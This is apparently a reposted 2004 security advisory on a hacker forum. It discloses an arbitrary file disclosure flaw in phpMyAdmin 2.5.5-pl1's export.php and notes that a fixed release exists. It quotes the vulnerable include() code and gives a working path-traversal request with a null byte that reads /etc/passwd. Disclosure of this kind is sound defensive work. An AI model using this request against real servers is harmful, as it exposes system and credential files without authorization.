Main Forums Links The Vault Misc Wallpapers Login

features post Articles (Articles) search files, exploits & links sections: Article ThemesArticlesArticles -> EncryptionArticles -> HardwareArticles -> HistoryArticles -> LinkArticles -> NetworkingArticles -> ProgrammingArticles -> SecurityArticles -> SoftwareBoxster's LifestyleHOW-TO -> *nixHOW-TO -> HardwareHOW-TO -> NetworkingHOW-TO -> ProgrammingHOW-TO -> WindowsInterviewsNew Order NewsletterOut of the boxReviews -> BooksReviews -> HardwareReviews -> SoftwareSite NewsTheme of the monthViews online chat  server:    irc.xor.cx  channel:    #neworder random article Python Business Forum RattleSnake May 5 2002 quotable quotes CALLAGHAN: you know nothing of the pain I feel, nothing. Old Skool NO Boards

Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior @ Exploits -> Other     Feb 06 2004, 23:16 (UTC+0) unsurreal writes: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior ################################################################################ Summary : phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There is a vulnerability in the current stable version of phpMyAdmin that allows an attacker to retrieve arbitrary files from the webserver with privileges of the webserver.. ################################################################################ Details : The export PHP script can be exploited to disclose arbitrary file using a include() PHP call. Vulnerable Systems: * phpMyAdmin 2.5.5-pl1 and prior Release Date : February 2, 2004 Severity : HIGH ################################################################################ Examples : ------------------------------------------- I - Arbitrary File Disclosure (HIGH Risk) File impacted : export.php 14:// What type of export are we doing? 15:if ($what == 'excel') { 16:    $type = 'csv'; 17:} else { 18:    $type = $what; 19:} 20: 21:/** 22: * Defines the url to return to in case of error in a sql statement 23: */ 24:require('./libraries/export/' . $type . '.php'); Exploit example: - -- HTTP Request -- http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 - -- HTTP Request -- The vulnerability is available evenif PHP register_globals is set to off. ################################################################################ Vendor Status : The information has been provided to the phpMyAdmin Project Managers. A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available. - --> http://www.phpmyadmin.net/home_page/ - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0 ################################################################################ Credit : Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com) < cco@netvigilance.com > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2 ekO25itz2ssIvwgf2WRb/4k= =Yuh1 -----END PGP SIGNATURE----- read comments (0) / write comment printer-friendly version Top of page

powered by

The content, logo and design of this site is © 2008 by particular authors, the New Order team and Box Network ltd.
For more information about New Order contact Marek
The privacy policy statement for Box Network.